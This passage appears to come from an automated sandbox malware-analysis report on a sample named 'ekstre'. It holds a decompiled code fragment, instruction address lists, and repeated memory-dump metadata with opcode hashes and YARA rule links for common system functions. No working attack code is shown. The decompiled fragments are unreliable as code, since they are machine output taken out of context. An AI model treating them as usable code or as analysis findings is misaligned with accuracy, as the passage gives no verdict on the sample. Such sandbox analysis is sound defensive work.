								_t279 = E34207CE8(_t287, _t230, _a8, _a12, _t233, _t259, _a16,  &_v24,  &_v44);
								__eflags = _t279;
								if(_t279 < 0) {
									goto L83;
								} else {
									_t207 = _v44;
									_v6 = 1;
									_t255 = ((_v44 & 0x00000008 | 0x00000004) + (_v44 & 0x00000008 | 0x00000004) | _t207 & 0x00001400) + ((_v44 & 0x00000008 | 0x00000004) + (_v44 & 0x00000008 | 0x00000004) | _t207 & 0x00001400);
									__eflags = _t255;
									_v32 = _t255;
									goto L27;
								}
							}
						}
					} else {
						_t279 = 0xc0000079;
						L83:
						goto L84;
					}
				} else {
					_t279 = 0xc0000079;
					L84:
					 *_a4 = _v28;
					return _t279;
				}
			}

0x342084c5
0x342084c8
0x342084cb
0x342084ce
0x342084d1
0x342084d4
0x342084df
0x342084e4
0x342084e5
0x342084ef
0x342084fb
0x342084fe
0x34208500
0x34208501
0x34208505
0x34208507
0x3420850a
0x3420850d
0x3420851d
0x3420850f
0x34208514
0x34208516
0x34208518
0x34208518
0x34208520
0x34208522
0x3420852e
0x34208531
0x34208534
0x34208549
0x34208536
0x3420853d
0x34208541
0x34208544
0x34208544
0x3420854c
0x3420854f
0x34208654
0x34208654
0x3420865f
0x34208665
0x34208668
0x3420866a
0x34208689
0x34208689
0x3420868b
0x3420868b
0x3420868d
0x3420868f
0x3420868f
0x34208695
0x34208695
0x34208698
0x34208698
0x00000000
0x34208698
0x3420866c
0x34208670
0x34208672
0x34208674
0x00000000
0x00000000
0x34208676
0x34208679
0x3420867c
0x34208683
0x34208685
0x34208685
0x00000000
0x34208555
0x34208555
0x34208558
0x3420855b
0x34208573
0x34208575
0x3420855d
0x34208564
0x34208568
0x3420856b
0x3420856e
0x3420856e
0x34208578
0x3420857a
0x34208650
0x00000000
0x34208580
0x34208580
0x34208584
0x34208589
0x3420863b
0x34208645
0x3420864b
0x34208632
0x34208632
0x34208636
0x3420869b
0x3420869b
0x3420869e
0x342086a1
0x342086a4
0x34208779
0x3420877c
0x3420877c
0x34208782
0x34208782
0x34208785
0x34208796
0x34208799
0x3420879c
0x3420879e
0x342087b0
0x342087b0
0x342087a0
0x342087ab
0x342087ab
0x342087b2
0x342087b5
0x342087b7
0x342087c5
0x342087c5
0x342087b9
0x342087c0
0x342087c0
0x342087c7
0x342087ca
0x342087cc
0x342087da
0x342087da
0x342087ce
0x342087d5
0x342087d5
0x342087dc
0x342087ff
0x34208801
0x34208804
0x34208806
0x34208812
0x3420881a
0x34208822
0x34208826
0x34208829
0x3420882b
0x34208847
0x3420882d
0x34208834
0x34208839
0x3420883c
0x3420883f
0x34208842
0x34208844
0x34208844
0x34208849
0x3420884c
0x34208850
0x34208853
0x34208855
0x34208871
0x34208871
0x34208857
0x3420885e
0x34208863
0x34208868
0x3420886b
0x3420886d
0x3420886d
0x34208873
0x34208887
0x3420888c
0x34208891
0x34208896
0x3420889c
0x3420889f
0x342088a1
0x342088b1
0x342088b9
0x342088b9
0x342088bb
0x342088bb
0x342088be
0x342088be
0x34208808
0x34208808
0x34208808
0x342088c0
0x342088c4
0x342088c7
0x342088cf
0x342088cf
0x342088d9
0x342088d9
0x342088dd
0x342088e5
0x342088e5
0x00000000
0x342088dd
0x342086aa
0x342086ad
0x342086af
0x342086b2
0x342086b9
0x342086bb
0x342086bb
0x342086bd
0x342086bd
0x342086c0
0x342086c2
0x00000000
0x342086c8
0x342086c8
0x342086ce
0x34208768
0x3420876e
0x34208771
0x00000000
0x34208771
0x342086d4
0x342086d6
0x00000000
0x00000000
0x342086dc
0x342086df
0x342086e2
0x342086e9
0x342086eb
0x342086ed
0x342086ed
0x342086f0
0x342086f3
0x342086f6
0x342086fd
0x342086ff
0x34208704
0x34208707
0x3420870e
0x34208710
0x34208710
0x34208707
0x34208712
0x34208715
0x34208719
0x3420871b
0x3420871d
0x34208723
0x34208726
0x34208729
0x34208730
0x34208732
0x34208732
0x3420871f
0x3420871f
0x3420871f
0x3420874c
0x3420874e
0x34208750
0x342088d6
0x00000000
0x34208756
0x3420875f
0x34208763
0x00000000
0x34208763
0x34208750
0x342086c2
0x3420858f
0x34208593
0x00000000
0x00000000
0x34208599
0x3420859c
0x342085a3
0x342085a5
0x342085a7
0x342085aa
0x342085b1
0x342085b3
0x342085b5
0x342085b8
0x342085bf
0x342085c1
0x342085c1
0x342085b8
0x342085aa
0x342085c6
0x342085cc
0x342085cf
0x342085d2
0x342085d4
0x342085da
0x342085df
0x342085e2
0x342085eb
0x342085ed
0x342085ed
0x342085d6
0x342085d6
0x342085d6
0x3420860b
0x3420860d
0x3420860f
0x00000000
0x34208615
0x34208615
0x3420861d
0x3420862d
0x3420862d
0x3420862f
0x00000000
0x3420862f
0x3420860f
0x3420857a
0x34208524
0x34208524
0x342088ea
0x00000000
0x342088ea
0x342084f1
0x342084f1
0x342088eb
0x342088f1
0x342088f8
0x342088f8

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35b1451a4237a10a3a8a2dbe9942a7a32f939758ca2206ea53aa0004b259a8cd
Instruction ID: 5414f63173db45b5e7168c9229c8322f1d89591614f079acc1e96a8ca3e65027
Opcode Fuzzy Hash: 35b1451a4237a10a3a8a2dbe9942a7a32f939758ca2206ea53aa0004b259a8cd
Instruction Fuzzy Hash: C7D1CD75A0060A8FEB05CF69C881AEFB7F6AF88394F15C169D855B7240EB35E905CF60

Uniqueness

Uniqueness Score: -1.00%

Function 3417D700 Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32dda08123b4b787d7b8fb10133d1fcb1e8ff2a3158c1193cdf964211e71e865
Instruction ID: a1d58ad8b4d88e604ab7abf5fa15af6e75f4e99c7d38ad9a35b9d03e5c7541b9
Opcode Fuzzy Hash: 32dda08123b4b787d7b8fb10133d1fcb1e8ff2a3158c1193cdf964211e71e865
Instruction Fuzzy Hash: 83C1E8B5A00B1D9FEB18CF58C8807AEBBB6BF45314F14829DD814AB280D774E941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 341B1763 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6069d009b09af982ae3a01b56e193dc2ee16dd4ecf5f7cd1aee058a127338b94
Instruction ID: d1e144530cdc4e0d6e860b78ae908eacc1747e7e85e2005ef4b56262c151b6b6
Opcode Fuzzy Hash: 6069d009b09af982ae3a01b56e193dc2ee16dd4ecf5f7cd1aee058a127338b94
Instruction Fuzzy Hash: B4D114B5A00A04DFEB41CF69C9C0B9A7BE9BF08340F0541BAED49DB216D731E945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 341737E4 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b2c0d3273f272f86647c0f23beeeb332ca08bc463a83550c8e0fc9635dfe5a
Instruction ID: 303702aa3400de67db0ee3fd3a46f4ca59d361c210f8dbf45f114d098b20d51d
Opcode Fuzzy Hash: f1b2c0d3273f272f86647c0f23beeeb332ca08bc463a83550c8e0fc9635dfe5a
Instruction Fuzzy Hash: 3BC146B1A00A09DFDB15CFA9D880A9EBBF5FF48750F11856EE41AAB350E734A901CF54

Uniqueness

Uniqueness Score: -1.00%

Function 34180445 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
Instruction ID: 1814ceb0a63f6c4e433e805a54aec8b5d77289273175343e4544833e267606af
Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
Instruction Fuzzy Hash: ADB10275700F49EFEB11CBA4C8D0BAEBBBAAF86300F1605A9D5519B281DB34E941DB50

Uniqueness

Uniqueness Score: -1.00%

Function 341B00A5 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51f47488765ad2dd8cfa9b50ea129820ba66952e596ff3c9e7f63352546fcd54
Instruction ID: 30236397317c7a53841870493349a6762069e87ba6a7aeef566b11191ee9327c
Opcode Fuzzy Hash: 51f47488765ad2dd8cfa9b50ea129820ba66952e596ff3c9e7f63352546fcd54
Instruction Fuzzy Hash: 37A19978B05F16DFEB14CF65CAD0BAABBB5FF44354F404069E985A7290EB34A845CB80

Uniqueness

Uniqueness Score: -1.00%

Function 34244080 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6e41f31e12552ba4a28a7c8ddd7ffdae557a46359e439227e135582b10737ba
Instruction ID: 4ddab24122306230aab8b43534bde18cc9a65ca5369dada96ac89349b3b5f6b3
Opcode Fuzzy Hash: e6e41f31e12552ba4a28a7c8ddd7ffdae557a46359e439227e135582b10737ba
Instruction Fuzzy Hash: 1EA1ACB2604A12EFE715CF28C980B4ABBEAFF48704F50452CE589ABB50C774E851CF91

Uniqueness

Uniqueness Score: -1.00%

Function 3423A6C0 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
Instruction ID: 21760b5e099a578ac71db86c423322e2f39ff3c16d11226d2a6d0e6470486620
Opcode Fuzzy Hash: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
Instruction Fuzzy Hash: 8A8161B5A1120A9FDB08CF99C880AAEB7F6FF84314F1581ADD815AB344DB74E902CB54

Uniqueness

Uniqueness Score: -1.00%

Function 3422B0AF Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
Instruction ID: a559c5348def2a62c91d1d08add1f194220f635522512af88beb1642853fe822
Opcode Fuzzy Hash: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
Instruction Fuzzy Hash: 11719F75E0022A9FDB90CF55C490AAFFBBAAF44790F95455AF810BB244E734D981C790

Uniqueness

Uniqueness Score: -1.00%

Function 341AE1A4 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44eafc44208c827af70a32116463918e43d007f491f8e34a39fa8f668964bd71
Instruction ID: 94689ca18781dd2d6363233603e5554433150d409f88faaa7cc7fbba8b5f7387
Opcode Fuzzy Hash: 44eafc44208c827af70a32116463918e43d007f491f8e34a39fa8f668964bd71
Instruction Fuzzy Hash: 5F814F75A40B09DFEB25CFA8C880ADAB7FAFF48354F10442DE555A7250DB70A845CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 3423970B Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca63423c500ea3f689d9ba402d5f443b6d5109bf1e0c2583d7ec3e6c78d897f7
Instruction ID: 3155c3bbf9afe84ab777260b9749c58f964988e99c2cb153b118eba8faa23874
Opcode Fuzzy Hash: ca63423c500ea3f689d9ba402d5f443b6d5109bf1e0c2583d7ec3e6c78d897f7
Instruction Fuzzy Hash: 4561A3F4B022169BEB15CF6AC890BAE77BAAF86354F504159E811BB3C0DB30D941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 3418C560 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b917bca6e2c63afd0e012333004484a2bce69ef8e47da5f82221a7fd2892d283
Instruction ID: 0daf17542df1e8d48254a749a48b7eb140c4e3a0bd35509dd0db3185f62d5c4f
Opcode Fuzzy Hash: b917bca6e2c63afd0e012333004484a2bce69ef8e47da5f82221a7fd2892d283
Instruction Fuzzy Hash: E771BDB4905A25DFDB258F58C8D06AEBBF4FF49710F11416AE851A7360E7B49801CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 3418252B Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58349ee924df8650b5b6f549cdb0529d6e92438d621c9ef91444e61618dc2eb9
Instruction ID: 8240e1a45e6c57b84f26f15883757f7c6f0db05fd73deacc9081d232e8db6bdd
Opcode Fuzzy Hash: 58349ee924df8650b5b6f549cdb0529d6e92438d621c9ef91444e61618dc2eb9
Instruction Fuzzy Hash: E9719B75604A418FE302CF28C8D0B66F7E5FF89700F1585AAE8598B351DB38D985CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 341777F9 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be3343da28c5466564eea52cf64b4efbc8e874b3f38a42d71e71f53f237bdbe2
Instruction ID: 078da24bf6df4009adefb01a9991a0063a064470846e02231e42429974d47119
Opcode Fuzzy Hash: be3343da28c5466564eea52cf64b4efbc8e874b3f38a42d71e71f53f237bdbe2
Instruction Fuzzy Hash: CB515A76609B01CFD714CF29C1C0A2ABBE9FF88750F5149AEE5A897355DB70E844CB82

Uniqueness

Uniqueness Score: -1.00%

Function 341AB490 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e35ac17fbaf337e854a1df6c91acdc0ff8efc23bdb31f8a769beba3b683093f
Instruction ID: f1603204c82accd1498a1b099b0ce506ee065eb4b34877b147a650c1e9ae7532
Opcode Fuzzy Hash: 5e35ac17fbaf337e854a1df6c91acdc0ff8efc23bdb31f8a769beba3b683093f
Instruction Fuzzy Hash: AD51E1B6200B41DFF320DF68CDC4F6B7BE9EB44764F10062DE961A7291DB3498858BA5

Uniqueness

Uniqueness Score: -1.00%

Function 341994FA Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e664f30a11f69d6048c44f7fad1b85488958400ae429ff1e1f6bdb9b9fa407c0
Instruction ID: a63ae9a4460828c2ab66abcaa5730b9aedb97576f1c4ae58d629ddbb0f289453
Opcode Fuzzy Hash: e664f30a11f69d6048c44f7fad1b85488958400ae429ff1e1f6bdb9b9fa407c0
Instruction Fuzzy Hash: AC519AB0A04B09EFFB218FA4CCC1BEEBBB9EB45300F60416AE598A7150DB7189049F50

Uniqueness

Uniqueness Score: -1.00%

Function 34183660 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef4c55925ff160366d911db35b001db1d4f487a39e3cc0c0cf6e98626b234dab
Instruction ID: 1d604ec8ddfcb669bf6413b9cd448914df5b13708b401060008b9ebfa993b268
Opcode Fuzzy Hash: ef4c55925ff160366d911db35b001db1d4f487a39e3cc0c0cf6e98626b234dab
Instruction Fuzzy Hash: D751DFB9A10A599FD301CF68C8C0669B7B1FF04710F5946A9E848DB740E736E991CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 341944D1 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
Instruction ID: b41aef1eb76207ae9cdf0b7b357b31a1f7cf2c61590b3683e4fcf53cdc7c1c1a
Opcode Fuzzy Hash: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
Instruction Fuzzy Hash: A9516FB5E04A19AFDF15CF94C490BEEBBF9AF44754F0081A9E901AB240EB74D945CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 341FE660 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7a88e87304113b3612f3762961c2bc04bcc7e5b5c6181f0252f0d9c5367c7b2d
Instruction ID: 7572bfa703342eed88005b5498aea948d972342e7324d405a565ffb7ac0c7294
Opcode Fuzzy Hash: 7a88e87304113b3612f3762961c2bc04bcc7e5b5c6181f0252f0d9c5367c7b2d
Instruction Fuzzy Hash: C251B375900F19EFEF308E90CCC4B9EB7BAAB00764F5147A9D510A7290D7769E468BD0

Uniqueness

Uniqueness Score: -1.00%

Function 3417510D Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4604f0061ed4341c2f51bae7d3e65610afeba36f2bbdbb54b14cfc02baff5fa8
Instruction ID: 7ac4438fa81e127119900ca3ba9ef4297ef6ca7df7beb18fd1aa4aa0ff3f684c
Opcode Fuzzy Hash: 4604f0061ed4341c2f51bae7d3e65610afeba36f2bbdbb54b14cfc02baff5fa8
Instruction Fuzzy Hash: 9F51ADB5B01B05DFFB51CFA8C8C0B9DBBB5AF0A398F110458E900F7654DB78A9408B54

Uniqueness

Uniqueness Score: -1.00%

Function 342056E0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54d17f16e73df959ade6801bfd14df47c5558d1bd833c14dc3138929320731b6
Instruction ID: 477876211fc93bed93aff0b7f9def6f34dd6f57e60585a4e6723d2fdab539849
Opcode Fuzzy Hash: 54d17f16e73df959ade6801bfd14df47c5558d1bd833c14dc3138929320731b6
Instruction Fuzzy Hash: CF512BB5A00615EFCB10CF58C880A9ABBF5FF09754B198699E818DB351D335EDA2CF90

Uniqueness

Uniqueness Score: -1.00%

Function 341AF63F Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d0ed23ff51c3ff00ac7f97ffc38426bf42bef4b6f6454590560695f267aeef9
Instruction ID: 153e74ade039cbf44dc9789134b392c152322cdefefee5bae06c912acd28d716
Opcode Fuzzy Hash: 6d0ed23ff51c3ff00ac7f97ffc38426bf42bef4b6f6454590560695f267aeef9
Instruction Fuzzy Hash: DA417CB6D00A19EFDB15DBA488C4AAF77BDDF05750F550169E904E7200D735DD018BE4

Uniqueness

Uniqueness Score: -1.00%

Function 3423A553 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
Instruction ID: 85b048883fa5f06de1bac94a5fcef0589de49ed2b127ef73d9c289cac46db8b3
Opcode Fuzzy Hash: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
Instruction Fuzzy Hash: BA41E5B2A127169FD715CF24C880A5AB3B9FF84394B06853EE8129B240EB30ED14CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 34243157 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8e46193db8e3b5b16c475c6b7e0eac9c3dab9cb937863f6c3e187fb8c66faf7
Instruction ID: cc54b53fc7df6aaa99288b87abd8f9a33bc2a7b33f4b09af37d81bc1f2c87338
Opcode Fuzzy Hash: f8e46193db8e3b5b16c475c6b7e0eac9c3dab9cb937863f6c3e187fb8c66faf7
Instruction Fuzzy Hash: 5B518C71200A06EFEB09CF54C980E46BBF6FF45344F5585AAE808AF352E771EA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 3417D454 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

